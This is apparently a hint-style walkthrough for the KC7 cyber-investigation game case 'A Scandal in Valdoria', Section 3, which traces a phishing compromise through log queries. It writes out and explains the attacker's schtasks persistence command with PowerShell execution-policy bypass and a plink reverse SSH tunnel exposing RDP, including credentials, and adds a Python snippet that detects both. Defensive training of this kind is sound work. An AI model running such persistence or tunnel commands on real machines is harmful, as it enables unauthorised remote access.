This post is a write-up with clues on how to resolve the KC7 investigation case A Scandal in Valdoria, Section 3: Plenty of Phish. You can use it as a guide when you get stuck, as it is structured as a fill-in-the-blanks solution.

Section 3: Plenty of Phish

Question 1: What is Sonia’s job role?

Table
| where <field> <operator> "Sonia Gose"

Question 2: What email address was used to send this email?

Type the email address newspaper_jobs@gmail.com.

Question 3: When was the email sent to Sonia Gose? Enter the exact timestamp from the logs.

The sender’s email address comes from the answer to question 2, and Sonia Gose’s email address comes from the Employee table.

Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">

Question 4: What URL was included in the email?

Answer from question 3.

Question 5: What is Sonia Gose’s IP address?

Answer from question 1.

Table
| where <field> <operator> "Sonia Gose"
Table
| where <field> <operator> <Sonia Gose's IP address>
and <field> <operator> <URL> //Q4

Just the file name, not the full link, from the answer to question 4.

Table
| where <field> <operator> "newspaper_jobs@gmail.com"
| where <field> <operator> <"Sonia Gose Email">

Question 8: What is Sonia Gose’s hostname?

Table
| where <field> <operator> "Sonia Gose"

Question 9: When did the downloaded docx file first show up on Sonia’s machine?

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 10: What was the full path of the docx file that was downloaded to Sonia’s machine?

Answer from question 9.

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 11: What is the sha256 hash of the file that Sonia downloaded?

Answer from question 9.

Table
| where <field> <operator> <"Sonia Gose's hostname">
| where <field> <operator> <"File Name"> //Q7

Question 12: What is the name of the file (.ps1) that was written to disk immediately after the docx was downloaded?

Only the file name.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000) //timestamp after the event

Question 13: When was this new file created?

Timestamp from answer to question 12.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where timestamp > datetime(2024-01-05 10:24:04.000)

Question 14: Let’s do some research! What type of file is this?

Use your Google-Fu skills!

Question 15: What does the attacker say to “let you know they are here”?

Lol! Do you see it? 😄

Question 16: According to the PowerShell script, what might be the hacker’s favorite color?

It is in the image from question 15.

Question 17: The purpose of the script is to invoke ____ and uncover da truth

It is in the image from question 15.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"
| count

Question 19: What is the full command used to create the scheduled task?

From question 18. Do you see it? It is in Task Scheduler.

Table
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "hacktivist_manifesto.ps1"

Question 20: What ExecutionPolicy is set in the command?

The policy will allow the script to run without restrictions.

This PowerShell command is using schtasks to create a scheduled task in Windows. Here is a breakdown of the command and what each part does:

  1. schtasks: This is a command-line tool in Windows used to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.

  2. /create: This flag tells schtasks that you want to create a new scheduled task.

  3. /sc hourly: This parameter specifies the schedule type for the task. In this case, hourly indicates that the task should run every hour.

  4. /mo 5: This modifies the schedule set by /sc. Here, it means the task will run every 5 hours.

  5. /tn "Hacktivist Manifesto": This sets the name of the task. The task will be identified in the Task Scheduler as “Hacktivist Manifesto”.

  6. /tr "powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\hacktivist_manifesto.ps1": This sets the action that the task will execute. Here, it runs powershell.exe with the specified parameters:

  • -ExecutionPolicy Bypass: This bypasses the PowerShell execution policy, allowing the script to run without restrictions.
  • -File C:\ProgramData\hacktivist_manifesto.ps1: This specifies the path to the PowerShell script that should be executed.

In summary, this command creates a scheduled task named “Hacktivist Manifesto” that runs a PowerShell script located at C:\ProgramData\hacktivist_manifesto.ps1 every 5 hours, bypassing any execution policy restrictions.

ProcessEvents
| where <field> <operator> "<Sonia Gose's Hostname>"
| where <field> <operator> "plink.exe"

plink.exe is a command-line interface to the PuTTY back ends.

  1. plink.exe: This is the command-line interface to the PuTTY SSH client.

  2. -R 3389:localhost:3389: This sets up a reverse SSH tunnel. Here’s what each part means:

  • -R: This specifies a reverse tunnel.
  • 3389:localhost:3389: This maps port 3389 on the remote machine to port 3389 on the local machine. Port 3389 is commonly used for Remote Desktop Protocol (RDP).

  3. -ssh: This tells plink.exe to use the SSH protocol for the connection.

  4. -l $had0w: This specifies the username to log in as on the remote machine. In this case, $had0w.

  5. -pw thruthW!llS3tUfree: This specifies the password for the user $had0w.

  6. 136.130.190.181: This is the IP address of the remote machine to which you are connecting.

This command sets up a reverse SSH tunnel from the local machine to the remote machine at IP address 136.130.190.181 using the username $had0w and the password thruthW!llS3tUfree. It maps port 3389 on the remote machine to port 3389 on the local machine. This allows you to connect to the Remote Desktop service on the local machine via the remote machine’s IP address and port 3389. Essentially, you can use this to remotely access the local machine’s desktop environment through the remote machine.
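As an added example (not part of the KC7 case or this write-up), the following Python parses the two command lines broken down above, the schtasks persistence task and the plink reverse tunnel, out of constructed ProcessEvents-style rows and flags what a defender would look for: a task whose action runs PowerShell with -ExecutionPolicy Bypass, and a reverse tunnel that exposes RDP (3389). The hostname and the rows themselves are constructed sample data; only the two command lines come from the case.

```python
import re

# Constructed sample rows shaped like the ProcessEvents table used in the case
# (timestamp, hostname, process_commandline). "SONIA-HOST" is a placeholder.
SAMPLE_EVENTS = [
    ("2024-01-05 10:24:09", "SONIA-HOST",
     'schtasks /create /sc hourly /mo 5 /tn "Hacktivist Manifesto" '
     '/tr "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\hacktivist_manifesto.ps1"'),
    ("2024-01-06 02:39:35", "SONIA-HOST",
     "plink.exe -R 3389:localhost:3389 -ssh -l $had0w -pw thruthW!llS3tUfree 136.130.190.181"),
    ("2024-01-06 02:40:01", "SONIA-HOST", "whoami"),
]

def parse_schtasks(cmd):
    """Return the fields of a 'schtasks /create' command line, or None if it is not one."""
    if not re.match(r"(?i)\s*schtasks(\.exe)?\s+/create\b", cmd):
        return None
    def opt(flag):  # value of /flag, quoted ("...") or a single bare token
        m = re.search(rf'(?i)/{flag}\s+("([^"]*)"|(\S+))', cmd)
        return (m.group(2) if m.group(2) is not None else m.group(3)) if m else None
    action = opt("tr") or ""
    return {
        "schedule": (opt("sc") or "").lower(), "modifier": opt("mo"),
        "task_name": opt("tn"), "action": action,
        # -ExecutionPolicy Bypass (or its -ep/-exec shorthand) is the weak setting Q20 asks about
        "bypasses_policy": bool(re.search(r"(?i)-e\w*\s+bypass", action)),
    }

def parse_plink(cmd):
    """Return tunnel details of a plink.exe command line, or None if it is not one."""
    if not re.match(r"(?i)\s*plink(\.exe)?\b", cmd):
        return None
    tun = re.search(r"-R\s+(\d+):([^:\s]+):(\d+)", cmd)   # -R listen:target_host:target_port
    user = re.search(r"-l\s+(\S+)", cmd)
    return {
        "reverse_tunnel": tun is not None,
        "remote_listen_port": int(tun.group(1)) if tun else None,
        "forward_to": f"{tun.group(2)}:{tun.group(3)}" if tun else None,
        "user": user.group(1) if user else None,
        "password_on_cmdline": "-pw" in cmd.split(),   # credential exposed in process telemetry
        "remote_host": cmd.split()[-1],
    }

def triage(events):
    """Flag scheduled-task persistence and RDP exposed over a reverse SSH tunnel."""
    findings = []
    for ts, host, cmd in events:
        task = parse_schtasks(cmd)
        if task and task["bypasses_policy"]:
            findings.append((ts, host, "persistence", task["task_name"]))
        tunnel = parse_plink(cmd)
        if tunnel and tunnel["reverse_tunnel"] and tunnel["forward_to"].endswith(":3389"):
            findings.append((ts, host, "rdp_reverse_tunnel", tunnel["remote_host"]))
    return findings
```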

Answer from question 21.

Answer from question 21.

Question 24: What six-letter command did the attackers run to figure out which user they are logged on as on the computer?

Use the timestamp from the answer to question 21.

ProcessEvents
| where hostname == "<Sonia Gose's Hostname>"
| where timestamp >= datetime(2024-01-06 02:39:35)

Question 25: How many discovery commands did the attackers run on this machine?

Answer from question 24. Check MITRE ATT&CK ID: T1018

Question 26: Do you think we can safely stop our investigation here? (yes/no)

🤔

Community Help

Join the KC7 Discord, channel #valdoria, to discuss the module.